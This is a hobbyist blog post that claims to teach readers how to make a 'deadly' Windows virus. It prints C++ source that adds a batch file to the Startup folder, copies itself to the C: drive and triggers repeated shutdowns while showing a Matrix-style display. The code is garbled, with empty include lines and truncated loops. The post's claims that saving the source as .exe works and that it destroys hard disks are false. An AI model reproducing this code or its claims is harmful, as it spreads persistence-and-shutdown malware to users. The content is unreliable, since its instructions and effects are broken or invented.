Sunday, November 11

How To make A dangerous VIRUS

Hii Friends Today am going to teach you how to make a deadly virus..
Its really very amazing. But i warn you dont try at your own computer..

Warning : - I will not be responsible for any harm your computer or others      computers, So please make sure do not try.




~~~~~~~~~~~~
POSTED BY
~~~~~~~~~~~~
hackerz_on_mig


This virus called as " matrix "

any way's here is the procedure

By some following steps you will make this virus

firstly open the

1). open the notepad

2). paste the coding in notepad given below :



// The Serverh4ckerz Matrix Virus
// Created by hackerz_on_mig
// Crackerstreet.blogspot.in

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i <>
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
Sleep(60);
}
}
for ( int j = 0; j <>
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout <<>
}
goto START;
}


3). save it as matrix.exe , in all files given below

Result - it will destroy your hard disk Or victim Hard disk, yes its true..... (you can b done only by replacing the hard disk)

-=NOTE=-
It is only for educational purpose . . .

Hope you will Not destroy some one hard disk. And your own also :P Lol...